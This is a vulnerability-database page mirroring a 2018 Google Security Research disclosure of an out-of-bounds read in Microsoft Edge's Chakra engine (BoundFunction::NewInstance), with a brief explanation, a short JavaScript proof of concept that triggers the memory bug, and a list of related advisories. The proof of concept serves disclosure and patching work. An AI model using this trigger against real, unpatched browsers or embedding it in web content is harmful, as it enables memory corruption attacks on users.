Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbGoogle Security ResearchEDB-ID:45012
HistoryJul 12, 2018 - 12:00 a.m.

Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read

2018-07-1200:00:00
Google Security Research
www.exploit-db.com
20

AI Score

7.4

Confidence

Low

JSON
/*
BoundFunction::NewInstance is used to handle calls to a bound function. The method first allocates a new argument array and copies the prepended arguments and others into the new argument array and calls the actual function. The problem is, it doesn't care about the CallFlags_ExtraArg flag which indicates that there's an extra argument (new.target in the PoC) at the end of the argument array. So the size of the new argument array created with the CallFlags_ExtraArg flag will be always 1 less then required, this leads to an OOB read.

PoC:
*/

function func() {
    new.target.x;
}

let bound = func.bind({}, 1);

Reflect.construct(bound, []);

Related

symantec 1
packetstorm 1
zdt 1
checkpoint_advisories 1
mscve 1
prion 12
osv 14
nvd 12
cvelist 12
veracode 8
cve 12
github 6
kaspersky 1
mskb 1
openvas 1
nessus 1
talosblog 1
trendmicroblog 1
symantec
symantec
Microsoft Edge CVE-2018-8139 Remote Memory Corruption Vulnerability
2018-05-08 00:00:00
packetstorm
packetstorm
Microsoft Edge Chakra JIT BoundFunction::NewInstance Bug
2018-07-12 00:00:00
zdt
zdt
Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read Exploit
2018-07-12 00:00:00
checkpoint_advisories
checkpoint_advisories
Microsoft Edge Out Of Bounds Read (CVE-2018-8139)
2018-07-12 00:00:00
mscve
mscve
Scripting Engine Memory Corruption Vulnerability
2018-05-08 07:00:00
prion
prion
Remote code execution
2018-05-09 19:29:00
Remote code execution
2018-05-09 19:29:00
Remote code execution
2018-05-09 19:29:00
osv
osv
CVE-2018-1022
2018-05-09 19:29:00
CVE-2018-8139
2018-05-09 19:29:01
ChakraCore RCE Vulnerability
2022-05-13 01:18:39
nvd
nvd
CVE-2018-8114
2018-05-09 19:29:01
CVE-2018-8137
2018-05-09 19:29:01
CVE-2018-8122
2018-05-09 19:29:01
cvelist
cvelist
CVE-2018-0951
2018-05-09 19:00:00
CVE-2018-8139
2018-05-09 19:00:00
CVE-2018-0946
2018-05-09 19:00:00
veracode
veracode
Remote Code Execution (RCE)
2018-06-28 06:50:17
Remote Code Execution (RCE)
2018-06-29 04:40:18
Remote Code Execution (RCE)
2018-06-28 06:40:19
cve
cve
CVE-2018-8114
2018-05-09 19:29:01
CVE-2018-0946
2018-05-09 19:29:00
CVE-2018-0953
2018-05-09 19:29:00
github
github
ChakraCore RCE Vulnerability
2022-05-13 01:18:49
ChakraCore RCE Vulnerability
2022-05-13 01:18:39
ChakraCore RCE Vulnerability
2022-05-13 01:18:39
kaspersky
kaspersky
KLA11247 Multiple vulnerabilities in Microsoft Browsers
2018-05-08 00:00:00
mskb
mskb
May 8, 2018—KB4103721 (OS Build 17134.48)
2018-05-08 07:00:00
openvas
openvas
Microsoft Windows Multiple Vulnerabilities (KB4103721)
2018-05-09 00:00:00
nessus
nessus
KB4103721: Windows 10 Version 1803 and Windows Server Version 1803 May 2018 Security Update
2018-05-08 00:00:00
talosblog
talosblog
Microsoft Patch Tuesday - May 2018
2018-05-08 12:02:00
trendmicroblog
trendmicroblog
TippingPoint Threat Intelligence and Zero-Day Coverage – Week of May 7, 2018
2018-05-11 15:37:20

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:45012
symantec1packetstorm1zdt1checkpoint_advisories1mscve1prion12osv14nvd12cvelist12veracode8cve12github6kaspersky1mskb1openvas1nessus1talosblog1trendmicroblog1